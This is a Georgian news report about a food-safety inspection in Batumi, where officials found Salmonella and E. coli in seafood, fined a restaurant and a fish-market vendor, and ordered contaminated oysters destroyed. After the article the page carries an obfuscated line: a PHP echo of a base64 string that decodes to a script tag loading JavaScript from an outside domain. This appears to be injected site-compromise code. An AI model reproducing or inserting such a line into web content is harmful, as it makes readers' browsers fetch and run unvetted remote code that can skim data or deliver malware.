celsiusi
ავერსი საქკაბელი

 სურსათის ეროვნული სააგენტოს ინფორმაციით, მათ ზღვის პროდუქტებში სალმონელას და ნაწლავის ჩხირი აღმოაჩინეს. უწყების მიერ გავრცელებული განცხადების თანახმად, აჭარის რეგიონულ სამმართველოში შევიდა შეტყობინება უზბეკეთის ოთხი მოქალაქის სავარაუდო მოწამვლის შესახებ, რის გამოც სააგენტოს თანამშრომლებმა ჩაატარეს არაგეგმიური შემოწმება ბათუმის რესტორან "ლურჯ ტალღაში" სადაც დამსვენებლებმა ზღვის პროდუქტები მიირთვეს.

"არაგეგმური ინსპექტირებისას, სამზარეულოში დაფიქსირდა ეტიკეტირების წესის დარღვევა, რის გამოც ბიზნესოპერატორი დაჯარიმდა 500 ლარით „სურსათის/ცხოველის საკვების უვნებლობის, ვეტერინარიისა და მცენარეთა დაცვის კოდექსის 66-ე მუხლის მე-6 ნაწილის შესაბამისად.

სურსათის ეროვნული სააგენტოს აჭარის რეგიონული სამმართველოს უფლებამოსილმა პირებმა სახელმწიფო კონტროლი განახორციელეს თევზის ბაზარშიც (ბათუმი, ბაქოს ქ.N33, დახლი 2), ინდივიდუალური მეწარმის კუთვნილ სარეალიზაციო ობიექტში, სადაც ლაბორატორიული კვლევისათვის აიღეს ზღვის პროდუქტის (ხამანწკები) ნიმუშები.

მიკრობიოლოგიური კვლევის შედეგად, ხუთივე ნიმუშში გამოვლინდა პათოგენური მიკროორგანიზმი Salmonella spp, ხოლო ერთში - ნაწლავის ჩხირის ჯგუფის ბაქტერია E.coli.

ბიზნესოპერატორი სურსათის/ცხოველის საკვების უვნებლობის, ვეტერინარიისა და მცენარეთა დაცვის კოდექსის 66-ე მუხლის 3 ნაწილის შესაბამისად, დაჯარიმდა 1000 ლარით; ასევე, დაევალა სურსათის ბაზარზე განთავსების აღკვეთა ან/და ბაზარზე უკვე განთავსებული სურსათის ამოღება, დასაწყობება, რაოდენობის აღრიცხვა და მიღებული ზომების თაობაზე სააგენტოს დაუყოვნებლივ ინფორმირება.

ობიექტში სარეალიზაციოდ განთავსებული ზღვის პროდუქტები დაილუქა და სურსათის ეროვნული სააგენტოს უფლებამოსილი პირების ზედამხედველობით განადგურდება,"- ნათქვამია სურსათის ეროვნული სააგენტოს მიერ გავრცელებულ ინფორმაციაში.

113
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");